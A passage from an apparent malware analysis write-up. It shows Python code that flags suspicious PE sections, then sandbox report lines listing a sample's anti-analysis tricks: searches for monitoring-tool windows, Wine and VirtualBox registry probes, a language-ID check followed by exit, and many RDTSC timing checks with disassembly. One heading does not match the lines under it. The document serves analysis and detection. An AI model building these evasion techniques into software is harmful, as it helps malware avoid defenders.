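        "nonstandard_sections": [s["name"] for s in sections if s["name"] not in STANDARD_SECTION_NAMES],
        "special_char_sections": [s["name"] for s in sections if not s["name"] or not s["name"].isprintable()],
        "writable_executable": [s["name"] for s in sections if {"E", "W"} <= set(s["rights"])],
        "entry_section": entry_point_section(data, sections),
    }

def build_sample_pe() -> bytes:
    """Constructed two-section PE32 for this demonstration (not the analysed sample):
    entry point and an E+W section sit in 'qyeleazo', stored CheckSum is wrong."""
    pe, opt_size, nsec = 0x40, 0xE0, 2
    hdr = bytearray(0x200)
    hdr[:2] = b"MZ"
    struct.pack_into("<I", hdr, 0x3C, pe)
    hdr[pe:pe + 4] = b"PE\x00\x00"
    struct.pack_into("<HHIIIHH", hdr, pe + 4, 0x14C, nsec, 0, 0, 0, opt_size, 0x102)
    opt = pe + 24
    struct.pack_into("<H", hdr, opt, 0x10B)          # PE32 magic
    struct.pack_into("<I", hdr, opt + 16, 0x2000)    # AddressOfEntryPoint
    struct.pack_into("<I", hdr, opt + 0x40, 0x1234)  # bogus CheckSum
    layout = ((b".text", IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ),
              (b"qyeleazo", IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE))
    for i, (name, chars) in enumerate(layout):
        off = opt + opt_size + 40 * i
        hdr[off:off + 8] = name.ljust(8, b"\x00")
        struct.pack_into("<IIII", hdr, off + 8, 0x1000, 0x1000 * (i + 1), 0x200, 0x200 * (i + 1))
        struct.pack_into("<I", hdr, off + 36, chars)
    return bytes(hdr) + b"\x90" * 0x200 + b"\xCC" * 0x200
```

A wrong checksum on its own is weak evidence: unsigned user-mode binaries routinely ship with a zero or stale value, and Windows validates the field only for drivers and for DLLs loaded at boot or into critical system processes. What makes this sample interesting is the combination the report shows: a first section that flips from ER on disk to EW at runtime, writable code sections, and an entry point in .taggant, a section name used by packers that implement the IEEE Taggant System.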

                Boot Survival

Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass

                Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetUserDefaultLangID, ExitProcess (graph_0-13594)
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B71989 second address: B7198E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B7198E second address: B719A1 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F0C44DA3FE8h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CF232E second address: CF2338 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F0C44EBA8E6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CF2338 second address: CF233C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CF13CE second address: CF13D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CF13D4 second address: CF13D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CF16AC second address: CF16BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jg 00007F0C44EBA8E6h 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CF16BC second address: CF16CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C44DA3FEFh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CF16CF second address: CF170A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 jmp 00007F0C44EBA8F8h 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007F0C44EBA8EFh 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 jnp 00007F0C44EBA8E6h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CF1848 second address: CF1865 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C44DA3FF9h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CF19D1 second address: CF19D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CF19D5 second address: CF19E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 popad 0x00000009 jc 00007F0C44DA3FE6h 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CF19E5 second address: CF19EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CF19EB second address: CF1A21 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C44DA3FF0h 0x00000007 jmp 00007F0C44DA3FF8h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jng 00007F0C44DA3FEEh 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CF1B64 second address: CF1B6A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CF5081 second address: B71989 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F0C44DA3FE8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c jmp 00007F0C44DA3FF1h 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 push esi 0x00000016 jmp 00007F0C44DA3FEDh 0x0000001b pop esi 0x0000001c pop eax 0x0000001d push ecx 0x0000001e mov dword ptr [ebp+122D3160h], edi 0x00000024 pop esi 0x00000025 push dword ptr [ebp+122D15BDh] 0x0000002b mov esi, dword ptr [ebp+122D3732h] 0x00000031 call dword ptr [ebp+122D19DAh] 0x00000037 pushad 0x00000038 mov dword ptr [ebp+122D18EDh], edx 0x0000003e xor eax, eax 0x00000040 jmp 00007F0C44DA3FF9h 0x00000045 ja 00007F0C44DA3FE7h 0x0000004b cmc 0x0000004c mov edx, dword ptr [esp+28h] 0x00000050 jns 00007F0C44DA3FECh 0x00000056 mov dword ptr [ebp+122D3676h], eax 0x0000005c mov dword ptr [ebp+122D18EDh], ecx 0x00000062 mov esi, 0000003Ch 0x00000067 mov dword ptr [ebp+122D18EDh], ebx 0x0000006d add esi, dword ptr [esp+24h] 0x00000071 clc 0x00000072 lodsw 0x00000074 or dword ptr [ebp+122D2AFAh], esi 0x0000007a jc 00007F0C44DA3FE7h 0x00000080 stc 0x00000081 add eax, dword ptr [esp+24h] 0x00000085 pushad 0x00000086 or ecx, dword ptr [ebp+122D353Eh] 0x0000008c movzx ecx, dx 0x0000008f popad 0x00000090 jmp 00007F0C44DA3FF7h 0x00000095 mov ebx, dword ptr [esp+24h] 0x00000099 stc 0x0000009a nop 0x0000009b push eax 0x0000009c push edx 0x0000009d push edx 0x0000009e push eax 0x0000009f push edx 0x000000a0 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CF50EC second address: CF5139 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F0C44EBA8EAh 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007F0C44EBA8EEh 0x00000015 popad 0x00000016 push ebx 0x00000017 jmp 00007F0C44EBA8F0h 0x0000001c pop ebx 0x0000001d popad 0x0000001e nop 0x0000001f mov cl, dl 0x00000021 push 00000000h 0x00000023 mov cx, di 0x00000026 push 15993280h 0x0000002b pushad 0x0000002c push eax 0x0000002d push edx 0x0000002e jl 00007F0C44EBA8E6h 0x00000034 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF5139 second address: CF5151 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C44DA3FF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF5151 second address: CF5157 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF5157 second address: CF51B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 xor dword ptr [esp], 15993200h 0x0000000d jmp 00007F0C44DA3FEBh 0x00000012 push 00000003h 0x00000014 push 00000000h 0x00000016 push ebp 0x00000017 call 00007F0C44DA3FE8h 0x0000001c pop ebp 0x0000001d mov dword ptr [esp+04h], ebp 0x00000021 add dword ptr [esp+04h], 0000001Ah 0x00000029 inc ebp 0x0000002a push ebp 0x0000002b ret 0x0000002c pop ebp 0x0000002d ret 0x0000002e push 00000000h 0x00000030 mov dword ptr [ebp+122D3160h], ebx 0x00000036 push 00000003h 0x00000038 mov si, di 0x0000003b call 00007F0C44DA3FE9h 0x00000040 push eax 0x00000041 push edx 0x00000042 pushad 0x00000043 push eax 0x00000044 pop eax 0x00000045 push eax 0x00000046 pop eax 0x00000047 popad 0x00000048 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF51B1 second address: CF51B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF51B7 second address: CF51BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF51BB second address: CF51CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jne 00007F0C44EBA8E6h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF51CE second address: CF51D4 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF51D4 second address: CF51F2 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F0C44EBA8E8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push eax 0x00000011 push edx 0x00000012 jl 00007F0C44EBA8ECh 0x00000018 jbe 00007F0C44EBA8E6h 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF51F2 second address: CF51F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF51F8 second address: CF51FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF52C1 second address: CF52C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF52C5 second address: CF52F9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C44EBA8F2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F0C44EBA8F8h 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF52F9 second address: CF5314 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 nop 0x00000007 xor edi, 13AAF683h 0x0000000d push 00000000h 0x0000000f clc 0x00000010 push 00AE2FA6h 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push eax 0x00000019 pop eax 0x0000001a pop eax 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF5314 second address: CF539A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xor dword ptr [esp], 00AE2F26h 0x0000000f mov dword ptr [ebp+122D1BC7h], edx 0x00000015 push 00000003h 0x00000017 push 00000000h 0x00000019 sbb cl, FFFFFFACh 0x0000001c push 00000003h 0x0000001e pushad 0x0000001f sbb si, 2800h 0x00000024 mov ecx, dword ptr [ebp+122D371Ah] 0x0000002a popad 0x0000002b mov edx, dword ptr [ebp+122D3536h] 0x00000031 push 473CB6DDh 0x00000036 jng 00007F0C44EBA8F0h 0x0000003c pushad 0x0000003d jc 00007F0C44EBA8E6h 0x00000043 push edx 0x00000044 pop edx 0x00000045 popad 0x00000046 add dword ptr [esp], 78C34923h 0x0000004d jbe 00007F0C44EBA8EAh 0x00000053 mov si, CDD2h 0x00000057 lea ebx, dword ptr [ebp+12456F68h] 0x0000005d pushad 0x0000005e pushad 0x0000005f mov edx, dword ptr [ebp+122D19CEh] 0x00000065 adc edx, 10D8EDDFh 0x0000006b popad 0x0000006c mov dword ptr [ebp+122D19BBh], eax 0x00000072 popad 0x00000073 xchg eax, ebx 0x00000074 push eax 0x00000075 push edx 0x00000076 jmp 00007F0C44EBA8F0h 0x0000007b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF539A second address: CF53A4 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F0C44DA3FECh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF53A4 second address: CF53B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF53B0 second address: CF53B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D14D6F second address: D14D73 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D14D73 second address: D14D7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D15490 second address: D154A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F0C44EBA8EEh 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D155F8 second address: D1560C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0C44DA3FF0h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1560C second address: D15612 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D157B6 second address: D157D4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0C44DA3FEEh 0x0000000b jc 00007F0C44DA3FEEh 0x00000011 push esi 0x00000012 pop esi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D15A75 second address: D15A7A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D16397 second address: D163A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F0C44DA3FE6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D19A68 second address: D19A9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jmp 00007F0C44EBA8EEh 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F0C44EBA8F9h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1D2DF second address: D1D2EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F0C44DA3FE6h 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e pop esi 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1D2EE second address: D1D300 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F0C44EBA8E6h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1D300 second address: D1D30F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0C44DA3FEBh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1D30F second address: D1D31E instructions: 0x00000000 rdtsc 0x00000002 jc 00007F0C44EBA8E6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D232AF second address: D232BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jng 00007F0C44DA3FE6h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D232BC second address: D232C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D232C0 second address: D232CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D232CC second address: D232D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F0C44EBA8E6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDD93A second address: CDD940 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2290D second address: D22913 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D22913 second address: D22918 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D22918 second address: D22924 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F0C44EBA8EEh 0x00000008 push esi 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D22FA9 second address: D22FC0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C44DA3FF3h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D22FC0 second address: D22FC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D25FDA second address: D25FEF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C44DA3FF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D25FEF second address: D26008 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0C44EBA8F5h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D26008 second address: D2600C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2600C second address: D2601B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pushad 0x0000000d popad 0x0000000e pop ecx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2601B second address: D26046 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007F0C44DA3FE6h 0x00000009 push eax 0x0000000a pop eax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 pushad 0x00000013 jmp 00007F0C44DA3FF5h 0x00000018 push ebx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D26C41 second address: D26C48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D26C48 second address: D26C4E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D26C4E second address: D26C5D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e pop edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D26E11 second address: D26E16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D26E16 second address: D26E3F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C44EBA8EDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F0C44EBA8F4h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D26EC3 second address: D26ECD instructions: 0x00000000 rdtsc 0x00000002 js 00007F0C44DA3FE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2AA40 second address: D2AA46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2AA46 second address: D2AA57 instructions: 0x00000000 rdtsc 0x00000002 js 00007F0C44DA3FE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push ebx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2C4F2 second address: D2C515 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F0C44EBA8EAh 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F0C44EBA8F5h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2CB17 second address: D2CB4F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jc 00007F0C44DA3FE6h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 mov edi, dword ptr [ebp+122D1F91h] 0x00000017 push 00000000h 0x00000019 jno 00007F0C44DA3FECh 0x0000001f push eax 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 pushad 0x00000024 popad 0x00000025 jmp 00007F0C44DA3FECh 0x0000002a popad 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2D537 second address: D2D53B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2D53B second address: D2D5A3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a or dword ptr [ebp+124718D3h], edx 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push ebx 0x00000015 call 00007F0C44DA3FE8h 0x0000001a pop ebx 0x0000001b mov dword ptr [esp+04h], ebx 0x0000001f add dword ptr [esp+04h], 0000001Ch 0x00000027 inc ebx 0x00000028 push ebx 0x00000029 ret 0x0000002a pop ebx 0x0000002b ret 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push ebp 0x00000031 call 00007F0C44DA3FE8h 0x00000036 pop ebp 0x00000037 mov dword ptr [esp+04h], ebp 0x0000003b add dword ptr [esp+04h], 0000001Dh 0x00000043 inc ebp 0x00000044 push ebp 0x00000045 ret 0x00000046 pop ebp 0x00000047 ret 0x00000048 xchg eax, ebx 0x00000049 je 00007F0C44DA3FF4h 0x0000004f push eax 0x00000050 push edx 0x00000051 pushad 0x00000052 popad 0x00000053 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2D5A3 second address: D2D5A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
